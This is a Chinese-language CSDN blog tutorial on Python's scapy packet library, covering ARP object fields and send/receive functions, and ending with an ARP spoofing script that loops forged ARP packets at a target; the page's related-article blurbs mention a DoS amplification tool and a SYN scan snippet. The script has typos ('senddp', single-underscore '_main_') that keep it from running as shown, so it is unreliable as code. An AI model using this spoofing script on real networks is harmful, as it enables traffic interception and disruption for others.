scapy模块的使用

最新推荐文章于 2023-11-06 14:28:35 发布
最新推荐文章于 2023-11-06 14:28:35 发布
阅读量737 收藏 2
点赞数 2
分类专栏: python学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44253823/article/details/103424952
版权

将类实例化为对象

  • 将类实例化之后的对象可采用“对象名.成员”的方式来调用类中的属性和方法。
  • 可以用内置函数isinstance()来判断一个对象是否为某个类的实例。

概念总结

  • 面向对象是一种编程方式,此编程方式的实现是基于类和对象的使用。
  • 类是一种模板,模板封装了多个函数供使用。
  • 对象是根据模板创建的实例,可调用被封装在类中的函数。
  • 模块中则集成了大量相关的类、函数、变量。

scapy的主要功能

可以根据自己的需要定义一些列报文,并通过scapy发送出去,最后在接收回应。

scapy的优势一方面是可以自由构造报文,另一方是接收到的回应只解码而不解释,他只会如实响应报文的内容,而不提供结论,如何来判断和利用这些响应报文,由我们自己决定。

scapy主要基于二、三、四层工作。

scapy除了可以作为python库被调用之外,也可以作为单独的工具使用。

ls()可以列出scapy支持的所有协议,每个协议都是一个类。
lsc()可以列出scapy支持的所有方法。
用help()查看帮助信息。
用display()或show()方法查看属性信息。

a=ARP() #将ARP类实例化为对象

arp类的属性
###[ ARP ]###
hwtype= 0x1
ptype= 0x800
hwlen= 6
plen= 4
op= who-has #请求(who-has,广播,询问谁有)
hwsrc= 00:0c:29:1d:65:95 #源MAC
psrc= 192.168.131.159 #源IP
hwdst= 00:00:00:00:00:00 #目的MAC
pdst= 0.0.0.0 #目的IP

scapy中的发包和收包

  • 只发不收
    send(),在第三层发包,不关心第二层的封装,第二层采用默认值;
    sendp(),在第二层发包,需要手动指定第二层如何封装。
  • 发包且接收回复
    sr()和sr1()都是在第三层发包,sr1表示只接收第一个回复。
    srp()和srp1()都是在第二层发包,srp1表示只接收第一个回复。
    默认情况下,如果目标主机不通,那么将一直发包,所以可以加上timeout参数。

2 scapy模块的使用

ARP欺骗

在这里插入图片描述
在这里插入图片描述
构造并发送ARP欺骗数据包

  • 构造数据包,加上二层封装。
    pkt = Ether(dst=‘ff:ff:ff:ff:ff:ff’)/ARP(pdst=‘192.168.131.160’)

3 编写ARP欺骗脚本

#ARP欺骗脚本
import sys
import time
from scapy.all import *
def arp_spoof(ip1,ip2):
    try:
        pkt=Ether(dst='ff:ff:ff:ff:ff:ff')/ARP(pdst=ip1,psrc=ip2)
        senddp(pkt)
        return
    except:
        return
def main():
    if len(sys.argv)!=3:
        print("使用方法:./arpspoof.py 目标主机IP 被欺骗主机IP")
        sys.exit()
    ip1=str(sys.argv[1]).strip()
    ip2=str(sys.argv[2]).strip()
    while True:
        arp_spoof(ip1,ip2)
        time.sleep(0.5)
if _name_=='_main_':
    main()
芷若。
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
专栏目录
python scapy模块
01-03
scapy模块,python里的全能网络抓包,发包,网络攻击,功能强大
利用scapy模拟发包+读取HTTP
gogoytgo的博客
06-23 1270
在实际生产中,有些会碰到奇怪的数据包,导致各类异常。现场实施人员抓包回来后,我们希望在办公室内模拟重现,分析解决这些问题。因此,用scapy来解决这些问题是最方便的。官网地址可以官网直接下载整合包,适合便携,也可以 Python 2.7或者3.X都可以下面就是一个读取文件,模拟发包到127.0.0.1:40002的例子。还附带了模拟丢包的场景(被注释掉的那些)。 需要注意,因为比较偷懒,假设包里已经预先处理好了,都是需要发送的UDP数据了。 3 RTP去重 类似的,有时候因为抓的any,如果是bond的网卡
python scapy发包_Python选择网卡发包及接收数据包
weixin_35696112的博客
02-09 1964
当一台计算机上有多个网卡时,需要选择对应IP地址的网卡进行发送数据包或者接受数据包。1、选择网卡发包(应用scapy):plface=conf.route.route("××.××.××.××")[0]#××.××.××.××为对应网卡网络中存在设备的IP地址。不能是需要发送数据包的网卡的IP地址(会报“result too large”)pkt=conf.L2socket(plface)pack...
scapy send()发包失败,OSError:[Errno 90] Messge too long
jiet07的博客
11-06 488
2.5.0在处理packages[0].haslayer(“Raw”)这块代码的时候存在问题。因为源pcap是有payload,但是返回为2.4.2版本处理这块代码的时候正常的。注意:2.5.0对部分回放的包不支持,有些事支持,只要是对haslayer(“Raw”)这块代码判断进行的变更。分片的前提是,数据帧有payload(数据部分)且长度大于分片值才进行分片。分片的大小一般为1500, 可以根据这个数值进行分片。不过每个接口的分片大小不一定,可以进行设置。通过scapy发包的时候,出现上述问题。
scapy库srp函数与srp1函数的区别
weixin_42601134的博客
02-01 358
Scapy库中的srp函数和srp1函数的主要区别是: srp函数发送数据包并等待回复,但不等待回复到达,一旦回复到达就立即返回。 srp1函数与srp函数类似,但它等待回复到达,并返回第一个到达的回复。 因此,srp1函数通常比srp函数慢,但它提供了更多的精确性和可靠性,因为它只返回与请求相关的回复。 ...
Scapy的基本操作
qq_45887590的博客
03-09 1万+
Scapy模块使用Scapy的基本操作Scapy模块中的函数利用Scapy进行端口屏蔽探测 Scapy的基本操作 1.IP()类型数据包 在Scapy中,每一个协议就是一个类。只需要实例化一个协议类,就可以创建一个该协议的数据包。例如,如果要创建一个IP类型的数据包,就可以使用如下命令。 ip = IP() ip.show() 运行结果: IP数据包最重要的属性就是源地址和目的地址,这两个属性可以使用src和dst来设置。 例如,要构造一个发送“192.168.43.1”的IP数据包,可以使用下面
python使用scapy模块实现ARP扫描的过程.docx
01-21
python使用scapy模块实现ARP扫描的过程.docx
python scapy
11-15
scapy compatibility.py 177行出错。用这个包可以解决。删除C:\Python27\Lib\site-packages\scapy目录下所有文件。解压zip包中文件,运行命令 python setup.py install
scapy模块实现windows系统下数据包回放工具,可实现client与server分网卡回放
01-28
scapy模块实现windows系统下数据包回放工具,可实现client与server分网卡回放
DenialPacketTool:我完全开发的工具。 使用此工具,您可以使用多种方法进行拒绝服务攻击。 欺骗和放大的方法很多(例如DNS,NTP放大)。 该工具是使用Scapy模块开发的
03-08
该工具是使用Scapy模块开发的。 因此,我绝不对您的行为负责,该工具仅用于教育目的,并且用于对属于您的基础结构进行安全测试。 安装 您需要git clone存储库: git clone http:// 然后运行文件以安装依赖项( )...
Python.Scapy -- 交互式数据包处理(可单独使用/在Python中调用)
eof.guo的博客
10-08 1227
Scapy的是一个强大的交互式数据包处理程序(使用python编写)。它能够伪造或者解码大量的网络协议数据包,能够发送、捕捉、匹配请求和回复包等等。它可以很容易地处理一些典型操作,比如端口扫描,tracerouting,探测,单元 测试,攻击或网络发现(可替代hping,NMAP,arpspoof,ARP-SK,arping,tcpdump,tethereal,P0F等)。 最重要的他还有很多更优
Scapy常用操作和命令(3)
Han的小站
01-23 1850
 syn端口扫描的写法: >>> ans, unans=sr(IP(src="172.31.100.222", dst="172.31.100.149")/TCP(sport=60000,dport=(1,1000),flags="S")) >>> ans.filter(lambda (s,r):r.sprintf("%TCP.flags%")=="SA").summ
scapy命令
weixin_30493321的博客
11-10 319
命令 官网解释 白话文 raw(pkt) assemble the packet 组装数据包 hexdump(pkt) have a hexadecimal dump 转换成十六进制数据 ls(pkt) have the list of fields values 查看指端列表值 pkt.summary() for ...
发包利器scapy
热门推荐
Dai Yuwen的专栏
08-02 1万+
发包利器scapy 最近在帮助用户调试一个网络问题的时候,发现一个很好用的发包工具scapy,记录一下使用方法。 我们在调试TCP/IP时, 有时需要发送一些报文,用的工具一般有ping, nping, netcat 等。 如果需要再深入微调IP或传输层的域,或发送一些畸型的报文,以上工具可能就不一定能做到了。 此时我们可以自己用socket 编程,不过太麻烦了,迭代周期太长了。 此时 sca...
如何提取Scapy库中的srp函数返回的数据
weixin_42594427的博客
02-01 299
要提取Scapy库中srp函数返回的数据,可以使用Scapy库提供的功能,例如: 将srp函数的返回值赋给一个变量,然后可以使用该变量访问数据。 ans, unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst="192.168.0.0/24"), timeout=2) for snd, rcv in ans: print rcv.spr...
Python渗透测试之Scapy模块&情报收集
waqqy的博客
04-25 3967
Scapy模块文件 关于Scapy Scapy是一个由Python语言编写的强大工具,它是大量程序编写人员最喜爱的一个网络模块。 也可以在自己的程序中使用这个模块来实现对网络数据包的发送、监听和解析。 这个模块相比起Nmap来说,更为底层。可以更为直观地了解到网络中的各种扫描和攻击行为,例如,要检测某一个端口是否开放,只需提供给Nmap一个端口号,而Nmap就会给出一个开放或者关闭的结果,但是并不知道Nmap是怎么做的。 如果想对网络中的各种问题进行深入研究,Scapy无疑是一个更好的选择,可以利用它来产
Scapy模块
weixin_50348916的博客
04-04 657
一、简介 ✦可以使用这个模块来实现对网络数据包的发送、监听和解析 ✦这个模块相比起Nmap来说,更为底层。可以更为直观地了解到网络中的各种扫描和攻击行为。 ✦可以利用它来产生各种类型的数据包并发送出去,Scapy也只会把收到的数据包展示给你 二、基本用法 ①在kali中启动一个终端,输入命令"scapy",就可以启动scapy环境 ②在Scapy中,每一个...
SCAPY学习笔记
xlsj雪松的博客
05-11 829
Scapy是一个可以让用户发送、侦听和解析并伪装网络报文的Python程序。这些功能可以用于制作侦测、扫描和攻击网络的工具。 1)常用的几个命令 conf:保存配置信息,修改方式,conf.verb = 2 ls():可以显示所有支持的数据包对象。例:list show、ls()、ls(TCP) lsc():列出所有函数 hide_defaults():用来删除一些用户提供的和default value相同的项目 例:>>> a=...
Python scapy模块
qq_41975735的博客
05-19 852
scapy模块 在python中可以通过scapy这个库轻松实现构造数据包、发送数据包、分析数据包 scapy不是内置模块,需要额外安装: pip install scapy 导入方式: from scapy.all import * //来自scapy.all文件,导入所有函数 python交互模式中:ls (*) *=Ether、IP、ICMP、TCP、UDP、ARP等等,查看可以配置的参数 1.构建包: Ether = Ether(src="源mac",dst="目的mac") ..
python中scapy模块下载
最新发布
04-27
在Python中,Scapy是一个功能强大的网络数据包处理库,它可以用于网络分析、嗅探、发送和接收网络数据包等。要下载Scapy模块,你可以按照以下步骤进行操作: 1. 打开终端或命令提示符。 2. 确保你已经安装了Python解释器。你可以在终端或命令提示符中输入`python --version`来检查Python版本。 3. 使用pip命令来安装Scapy模块。输入以下命令并按下回车键: ``` pip install scapy ``` 这将自动从Python Package Index(PyPI)下载并安装Scapy模块及其依赖项。 安装完成后,你就可以在Python脚本中导入Scapy模块使用其提供的功能了。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值